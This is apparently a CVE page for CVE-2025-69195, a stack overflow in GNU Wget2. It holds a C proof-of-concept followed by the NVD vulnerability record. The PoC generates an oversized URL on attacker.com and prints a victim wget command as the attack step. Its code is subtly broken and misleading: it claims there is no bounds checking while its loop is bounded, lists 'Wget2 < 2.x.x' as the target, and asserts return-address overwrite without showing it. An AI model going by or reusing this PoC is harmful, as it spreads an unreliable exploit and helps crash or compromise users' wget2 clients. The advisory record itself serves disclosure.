CVE-2025-69195

// CVE-2025-69195 PoC - GNU Wget2 Stack Buffer Overflow // This PoC demonstrates the vulnerability in filename sanitization logic #include <stdio.h> #include <stdlib.h> #include <string.h> // Simulated vulnerable function similar to wget2's filename sanitization void vulnerable_sanitize_filename(char *output, const char *input) { // Vulnerable: No bounds checking on buffer char buffer[256]; // Fixed size stack buffer int i = 0; // Simulate the vulnerable code path // In real wget2, this occurs in filename restriction logic while (*input && i < sizeof(buffer)) { buffer[i++] = *input++; } buffer[i] = '\0'; // Null terminator // If input is longer than 256 chars, overflow occurs // Attackers can overwrite return address and execute arbitrary code strcpy(output, buffer); // Copy to output } // Generate malicious URL with oversized filename char* generate_malicious_url() { // Create URL with filename exceeding 256 chars // This triggers stack buffer overflow in wget2's sanitization const char *prefix = "https://attacker.com/"; int prefix_len = strlen(prefix); int overflow_len = 512; // Exceeds 256 char buffer char *url = malloc(prefix_len + overflow_len + 1); strcpy(url, prefix); // Fill with repeated pattern to trigger overflow for (int i = 0; i < overflow_len; i++) { url[prefix_len + i] = 'A'; } url[prefix_len + overflow_len] = '\0'; return url; } int main() { printf("CVE-2025-69195 PoC - GNU Wget2 Stack Buffer Overflow\n"); printf("Target: GNU Wget2 < 2.x.x (vulnerable versions)\n\n"); char *malicious_url = generate_malicious_url(); printf("Generated malicious URL length: %ld\n", strlen(malicious_url)); printf("This URL will trigger buffer overflow when processed by wget2\n"); printf("\nAttack vector:\n"); printf("1. Attacker hosts malicious URL\n"); printf("2. Victim runs: wget --restrict-file-names=unix %s\n", malicious_url); printf("3. wget2 crashes or attacker executes code\n"); free(malicious_url); return 0; } /* Usage: 1. Compile: gcc -o poc poc.c 2. Run: ./poc 3. Attack: wget --restrict-file-names=unix https://attacker.com/[500+ chars filename] Note: This is a conceptual PoC. Actual exploitation requires specific environment and wget2 version. Update wget2 to the latest patched version. */

{"cve": {"id": "CVE-2025-69195", "sourceIdentifier": "[email protected]", "published": "2026-01-09T08:15:58.147", "lastModified": "2026-03-05T20:12:29.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GNU Wget2. This vulnerability, a stack-based buffer overflow, occurs in the filename sanitization logic when processing attacker-controlled URL paths, particularly when filename restriction options are active. A remote attacker can exploit this by providing a specially crafted URL, which, upon user interaction with wget2, can lead to memory corruption. This can cause the application to crash and potentially allow for further malicious activities."}, {"lang": "es", "value": "Se encontró una falla en GNU Wget2. Esta vulnerabilidad, un desbordamiento de búfer basado en pila, ocurre en la lógica de saneamiento de nombres de archivo al procesar rutas de URL controladas por el atacante, particularmente cuando las opciones de restricción de nombres de archivo están activas. Un atacante remoto puede explotar esto al proporcionar una URL especialmente diseñada, lo que, tras la interacción del usuario con wget2, puede llevar a la corrupción de memoria. Esto puede causar que la aplicación se bloquee y potencialmente permitir actividades maliciosas adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:wget2:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.2.1", "matchCriteriaId": "82FE97C3-E963-4A87-8C4B-761F5BDA7E72"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-69195", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2425770", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}